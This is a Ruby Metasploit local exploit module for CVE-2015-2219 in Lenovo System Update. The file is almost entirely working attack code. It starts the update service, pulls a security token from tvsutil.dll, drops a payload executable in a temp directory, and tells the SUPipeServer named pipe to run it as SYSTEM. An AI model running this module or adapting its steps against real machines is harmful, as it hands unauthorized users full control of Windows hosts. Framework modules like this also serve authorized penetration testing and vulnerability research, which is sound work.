##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::FileDropper
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Services

  Rank = ExcellentRanking

  def initialize(info={})
    super(update_info(info, {
      'Name'            => 'Lenovo System Update Privilege Escalation',
      'Description'     => %q{
        The named pipe, \SUPipeServer, can be accessed by normal users to interact with the
        System update service. The service provides the possibility to execute arbitrary
        commands as SYSTEM if a valid security token is provided. This token can be generated
        by calling the GetSystemInfoData function in the DLL tvsutil.dll. Please, note that the
        System Update is stopped by default but can be started/stopped calling the Executable
        ConfigService.exe.
      },
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Michael Milvich', # vulnerability discovery, advisory
          'Sofiane Talmat',  # vulnerability discovery, advisory
          'h0ng10'           # Metasploit module
        ],
      'Arch'            => ARCH_X86,
      'Platform'        => 'win',
      'SessionTypes'    => ['meterpreter'],
      'DefaultOptions'  =>
        {
          'EXITFUNC'    => 'thread',
        },
      'Targets'         =>
        [
          [ 'Windows', { } ]
        ],
      'Payload'         =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'References'      =>
        [
          ['OSVDB', '121522'],
          ['CVE', '2015-2219'],
          ['URL', 'http://www.ioactive.com/pdfs/Lenovo_System_Update_Multiple_Privilege_Escalations.pdf']
        ],
      'DisclosureDate' => 'Apr 12 2015',
      'DefaultTarget'  => 0
    }))

    register_options([
      OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)']),
      OptInt.new('Sleep', [true, 'Time to sleep while service starts (seconds)', 4]),
    ], self.class)

  end

  def check
    os = sysinfo['OS']

    unless os =~ /windows/i
      return Exploit::CheckCode::Safe
    end

    svc = service_info('SUService')
    if svc && svc[:display] =~ /System Update/
      vprint_good("Found service '#{svc[:display]}'")
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end


  def write_named_pipe(pipe, command)
    invalid_handle_value = 0xFFFFFFFF

    r = session.railgun.kernel32.CreateFileA(pipe, 'GENERIC_READ | GENERIC_WRITE', 0x3, nil, 'OPEN_EXISTING', 'FILE_FLAG_WRITE_THROUGH | FILE_ATTRIBUTE_NORMAL', 0)
    handle = r['return']

    if handle == invalid_handle_value
      fail_with(Failure::NoTarget, "#{pipe} named pipe not found")
    else
      vprint_good("Opended #{pipe}! Proceeding...")
    end

    begin

      # First, write the string length as Int32 value
      w = client.railgun.kernel32.WriteFile(handle, [command.length].pack('l'), 4, 4, nil)

      if w['return'] == false
        print_error('The was an error writing to pipe, check permissions')
        return false
      end

      # Then we send the real command
      w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)

      if w['return'] == false
        print_error('The was an error writing to pipe, check permissions')
        return false
      end
    ensure
      session.railgun.kernel32.CloseHandle(handle)
    end
    true
  end


  def get_security_token(lenovo_directory)
    unless client.railgun.get_dll('tvsutil')
      client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
      client.railgun.add_function('tvsutil', 'GetSystemInfoData', 'DWORD', [['PWCHAR', 'systeminfo', 'out']], nil, 'cdecl')
    end

    dll_response = client.railgun.tvsutil.GetSystemInfoData(256)

    dll_response['systeminfo'][0,40]
  end


  def config_service(lenovo_directory, option)
    cmd_exec("#{lenovo_directory}\\ConfigService.exe #{option}")
  end


  def exploit
    if is_system?
      fail_with(Failure::NoTarget, 'Session is already elevated')
    end

    su_directory = service_info('SUService')[:path][1..-16]
    print_status('Starting service via ConfigService.exe')
    config_service(su_directory, 'start')

    print_status('Giving the service some time to start...')
    Rex.sleep(datastore['Sleep'])

    print_status("Getting security token...")
    token = get_security_token(su_directory)
    vprint_good("Security token is: #{token}")

    if datastore['WritableDir'].nil? || datastore['WritableDir'].empty?
      temp_dir = get_env('TEMP')
    else
      temp_dir = datastore['WritableDir']
    end

    print_status("Using #{temp_dir} to drop the payload")

    begin
      cd(temp_dir)
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
    end

    print_status('Writing malicious exe to remote filesystem')
    write_path = pwd
    exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"

    begin
      write_file(exe_name, generate_payload_exe)
      register_file_for_cleanup("#{write_path}\\#{exe_name}")
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
    end

    print_status('Sending Execute command to update service')

    begin
      write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")
    rescue Rex::Post::Meterpreter::RequestError
      fail_with(Failure::Unknown, 'Failed to write to pipe')
    end

    unless write_res
      fail_with(Failure::Unknown, 'Failed to write to pipe')
    end

    print_status('Stopping service via ConfigService.exe')
    config_service(su_directory, 'stop')
  end

end
